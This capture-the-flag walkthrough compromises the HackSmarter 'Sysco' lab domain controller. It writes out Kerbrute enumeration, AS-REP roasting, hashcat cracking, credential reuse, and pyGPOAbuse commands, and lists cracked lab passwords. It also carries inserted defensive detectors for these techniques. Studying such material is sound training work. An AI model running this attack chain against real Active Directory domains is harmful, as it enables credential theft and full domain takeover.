HS-Sysco

HackSmarter Sysco - Complete Penetration Testing Walkthrough

Introduction

Welcome to this comprehensive penetration testing writeup for the Sysco machine from HackSmarter. This walkthrough demonstrates a full Active Directory exploitation chain, from initial reconnaissance to domain compromise. Throughout this engagement, I utilized various tools including Nmap, Kerbrute, Netexec, Hashcat, Evil-WinRM, and pyGPOAbuse to successfully compromise the target domain.

This writeup will guide you through each step of the penetration test, including service enumeration, user discovery, AS-REP roasting, credential spraying, email enumeration, privilege escalation via Group Policy Objects (GPO), and ultimately achieving Domain Administrator access.


Initial Reconnaissance

Nmap Scan Results

Starting with a comprehensive port scan to identify running services:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 126 Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: DD229045B1B32B2F2407609235A23238
|_http-title: Index - Sysco MSP
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal
| rdp-ntlm-info:
|   Target_Name: SYSCO
|   NetBIOS_Domain_Name: SYSCO
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: SYSCO.LOCAL
|   DNS_Computer_Name: DC01.SYSCO.LOCAL
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-31T06:20:07+00:00
|_ssl-date: 2025-10-31T06:20:46+00:00; -1s from scanner time.
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49743/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49816/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC

The scan reveals this is a Windows Domain Controller running Active Directory services. Key observations include:

  • DNS (Port 53) - Domain Name Service
  • HTTP (Port 80) - Web server running Apache
  • LDAP (Ports 389, 3268) - Active Directory services
  • SMB (Port 445) - File sharing
  • RDP (Port 3389) - Remote Desktop access
  • Domain: SYSCO.LOCAL
  • Computer Name: DC01

UDP Scan Results

panosoiko@parrot:~$ udpx -t 10.1.76.162

udpx v1.0.7, by @nullt3r

2025/10/31 08:21:00 [+] Starting UDP scan on 1 target(s)
2025/10/31 08:21:04 [*] 10.1.76.162:53 (dns)
2025/10/31 08:21:08 [*] 10.1.76.162:123 (ntp)
2025/10/31 08:21:17 [*] 10.1.76.162:88 (kerberos)
2025/10/31 08:21:30 [+] Scan completed

The UDP scan confirms Kerberos (port 88) and NTP services are running.

Hosts File Configuration

Before proceeding, we need to add the domain and DC to our hosts file:

sudo nano /etc/hosts

Add the following entry:

10.1.76.162    dc01.sysco.local sysco.local

Web Enumeration

HTTP Service Analysis

The web server on port 80 hosts a generic corporate website for Sysco MSP. During enumeration, I discovered valuable information about potential usernames:

Potential Users Found on Website

Discovered potential usernames:

Greg.Shields
Sarah.Jhonson
Jack.Dowland
Lainey.Moore

Directory Fuzzing

Running Feroxbuster to discover hidden directories:

feroxbuster -u http://10.1.76.162/

The scan revealed a Roundcube webmail portal - an excellent target for credential-based attacks once we obtain valid credentials.

Roundcube Portal Discovery


Active Directory Enumeration

SMB Enumeration

Initial SMB enumeration revealed:

  • Null (anonymous) authentication is accepted
  • RID cycling is not possible, so users cannot be enumerated that way
  • Shares cannot be listed without credentials
  • The Guest account is disabled

User Validation with Kerbrute

Using Kerbrute to validate the usernames discovered from the website:

kerbrute userenum -d sysco.local --dc dc01.sysco.local usernames.txt

Valid Users Confirmed

Three valid accounts confirmed:

  • Greg.Shields
  • Jack.Dowland
  • Lainey.Moore

Initial Access - AS-REP Roasting

AS-REP Roasting Attack

After attempting password spraying with usernames as passwords (unsuccessful), I proceeded with AS-REP roasting to identify accounts that don’t require Kerberos pre-authentication:

nxc ldap dc01.sysco.local -u names -p '' --asreproast output.txt

AS-REP Roasting Success

Success! We obtained a Kerberos AS-REP hash for Jack.Dowland.
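Both the Kerbrute validation and the AS-REP roast above leave a distinctive trace in the Domain Controller's Security log (event 4768, "A Kerberos authentication ticket (TGT) was requested"). The following detector is an added example, not part of the original writeup: it runs two rules over constructed 4768 events (a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN results from one source, and a TGT issued with pre-auth type 0 and RC4 encryption) and includes the preventive check that finds accounts with the "Do not require Kerberos preauthentication" flag set. The sample events and userAccountControl values are constructed, not logs from the Sysco DC.

```python
"""Flag Kerberos user enumeration and AS-REP roasting in Windows 4768 events."""
from collections import defaultdict

# Constructed sample 4768 (TGT requested) events, reduced to the fields the rules
# need; field names follow the Windows Security log. Not logs from the Sysco DC.
SAMPLE_4768 = [
    {"TargetUserName": "bob.smith", "IpAddress": "10.1.76.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "sarah.jhonson", "IpAddress": "10.1.76.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "alice.w", "IpAddress": "10.1.76.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "jack.dowland", "IpAddress": "10.1.76.50", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "lainey.moore", "IpAddress": "10.1.76.20", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit that makes an account roastable
ENUM_THRESHOLD = 3           # distinct unknown principals from one IP before alerting


def detect(events, enum_threshold=ENUM_THRESHOLD):
    """Return (rule, subject, detail) findings for the two techniques."""
    unknown_by_ip = defaultdict(set)
    findings = []
    for ev in events:
        status = ev["Status"].lower()
        if status == "0x6":
            # KDC_ERR_C_PRINCIPAL_UNKNOWN: the user does not exist. Kerbrute
            # userenum produces a burst of these from one source address.
            unknown_by_ip[ev["IpAddress"]].add(ev["TargetUserName"].lower())
        elif (status == "0x0" and ev["PreAuthType"] == "0"
              and ev["TicketEncryptionType"].lower() == "0x17"):
            # TGT issued with no pre-authentication and an RC4 (etype 23) key:
            # the AS-REP is crackable offline, which is hashcat mode 18200.
            findings.append(("asrep_roast", ev["TargetUserName"].lower(), ev["IpAddress"]))
    for ip, users in unknown_by_ip.items():
        if len(users) >= enum_threshold:
            findings.append(("user_enum", ip, f"{len(users)} unknown principals"))
    return findings


def accounts_without_preauth(uac_by_sam):
    """Preventive check: accounts with 'Do not require Kerberos preauthentication' set."""
    return sorted(sam for sam, uac in uac_by_sam.items() if uac & DONT_REQ_PREAUTH)
```

The userAccountControl values for the preventive check would normally come from an LDAP query against the DC; 0x200 is NORMAL_ACCOUNT, so 0x400200 is a normal account with the pre-auth flag set.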

Hash Cracking

Saving the hash to a file and cracking it with Hashcat:

hashcat hash /usr/share/wordlists/rockyou.txt

Hashcat automatically detected the hash type (AS-REP). If manual mode selection is needed, use -m 18200.

Cracked credentials:

Jack.Dowland:musicman1

Share Access Verification

Testing the credentials against SMB shares:

SMB Share Access

The credentials provide access to various shares, confirming their validity.


Bloodhound Analysis

Data Collection

Using Netexec to collect Bloodhound data:

netexec ldap dc01.sysco.local -u Jack.Dowland -p musicman1 --bloodhound --dns-server 10.1.76.162 -c ALL --dns-tcp

Attack Path Analysis

Clear Privilege Escalation Path

Key findings:

  • Jack.Dowland has no direct privilege escalation paths
  • Greg.Shields shows excellent potential as our next target
  • Greg.Shields has GenericAll permissions over the DEFAULT DOMAIN POLICY

This GenericAll permission is critical: it grants full control of the GPO object, including its settings. The Default Domain Policy is linked at the domain root, so any setting written into it is applied to every computer in the domain, the Domain Controller included, which makes it a direct route to domain compromise.


Email Enumeration

Roundcube Access

Testing Jack.Dowland’s credentials on the Roundcube portal - successful login!

Email Investigation

Email Discovery

While reviewing Jack’s emails, I discovered a message sent to Lainey.Moore regarding a router configuration. The email contained a password hash.

Hash Cracking Round 2

hashcat hash /usr/share/wordlists/rockyou.txt

The hash cracked to: Chocolate1

Credential Validation

First, attempting to use the password for Lainey.Moore:

netexec smb dc01.sysco.local -u lainey.moore -p Chocolate1 --shares

WinRM Access Achieved

Success! Lainey.Moore is a member of the Remote Desktop Users group, granting us WinRM access.


Lateral Movement

WinRM Session

Establishing a WinRM session as Lainey.Moore:

evil-winrm -i dc01.sysco.local -u lainey.moore -p Chocolate1

Credential Discovery

Cleartext Password in LNK File

While enumerating the file system, I discovered a .lnk file containing cleartext credentials:

\Documents.-ssh netadmin@10.0.0.1 -pw 5y5coSmarter2025!!!

Discovered password: 5y5coSmarter2025!!!

Credential Spraying

The domain has only three users plus the Administrator account. Testing this password against Greg.Shields:

Greg.Shields Compromised

Successful authentication! We now have access to Greg.Shields’ account, which has GenericAll permissions over the Default Domain Policy.


Privilege Escalation via GPO Abuse

GPO Abuse Strategy

With GenericAll permissions on the Default Domain Policy GPO, we can abuse this to add a user to the local administrators group. I’ll use pyGPOAbuse to accomplish this.

Repository: https://github.com/Hackndo/pyGPOAbuse

Adding Administrative User

The following command adds a user named john (with password H4x00r123..) to the local administrators group:

python3 pygpoabuse.py 'sysco.local'/'greg.shields':'5y5coSmarter2025!!!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"

Group Policy Update

For the GPO changes to take effect, we need to force a Group Policy update. From our WinRM session as Lainey.Moore:

gpupdate

Group Policy Update

The Group Policy update successfully applies our malicious configuration.
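A GPO modification of this kind is visible on disk: the Default Domain Policy lives in SYSVOL under Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}, and tools of this kind typically plant a Group Policy Preferences immediate scheduled task (Machine\Preferences\ScheduledTasks\ScheduledTasks.xml) that runs on the next gpupdate; that mechanism is an assumption here, as the writeup does not describe pyGPOAbuse's internals. The scanner below is an added example, not code from the writeup or from pyGPOAbuse: it parses a constructed ScheduledTasks.xml and flags any ImmediateTaskV2 entry or any task whose command changes local group membership. CLSID and uid values in the sample are placeholders.

```python
"""Scan a GPP ScheduledTasks.xml for immediate tasks or local-group changes."""
import re
import xml.etree.ElementTree as ET

# Constructed sample shaped like SYSVOL\<domain>\Policies\{GUID}\Machine\
# Preferences\ScheduledTasks\ScheduledTasks.xml after an immediate task was
# added. CLSID and uid values are placeholders, not real GPP identifiers.
SAMPLE_XML = """<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <ImmediateTaskV2 clsid="{CLSID-PLACEHOLDER}" name="TASK_1" uid="{UID-PLACEHOLDER}">
    <Properties action="C" name="TASK_1" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command>
        <Arguments>/c net localgroup administrators john /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{CLSID-PLACEHOLDER}" name="Cleanup" uid="{UID-PLACEHOLDER}">
    <Properties action="U" name="Cleanup" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cleanmgr.exe</Command>
        <Arguments>/sagerun:1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# net/net1 localgroup <group> <member> /add, case-insensitive
GROUP_CHANGE = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+\S+\s+\S+\s+/add\b", re.I)


def suspicious_tasks(xml_text):
    """Return (name, tag, command line) for every task that is either an
    ImmediateTaskV2 (runs on the next gpupdate) or modifies a local group."""
    hits = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        if props is None:
            continue
        cmdline = " ".join(
            f"{ex.findtext('Command', default='')} {ex.findtext('Arguments', default='')}".strip()
            for ex in props.iter("Exec")
        )
        if task.tag == "ImmediateTaskV2" or GROUP_CHANGE.search(cmdline):
            hits.append((task.get("name"), task.tag, cmdline))
    return hits
```

Pair this with a file-integrity baseline of the SYSVOL policy tree and with Security event 5136 on the groupPolicyContainer object, since an attacker bumps the GPO version number to make clients pull the new settings.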


Domain Compromise

Administrative Access

Now we can authenticate as the john user with local administrator privileges:

evil-winrm -i 10.1.76.162 -u john -p 'H4x00r123..'

With local administrator access, we can:

  • Access the Administrator’s home directory
  • Retrieve the root flag
  • Dump credentials from memory
  • Perform post-exploitation activities

Conclusion

This penetration test demonstrated a complete attack chain against an Active Directory environment:

  1. Reconnaissance - Service enumeration and username discovery
  2. Initial Access - AS-REP roasting to obtain credentials
  3. Enumeration - Email analysis leading to additional credentials
  4. Lateral Movement - Credential reuse across multiple accounts
  5. Privilege Escalation - GPO abuse via GenericAll permissions
  6. Domain Compromise - Local administrator access achieved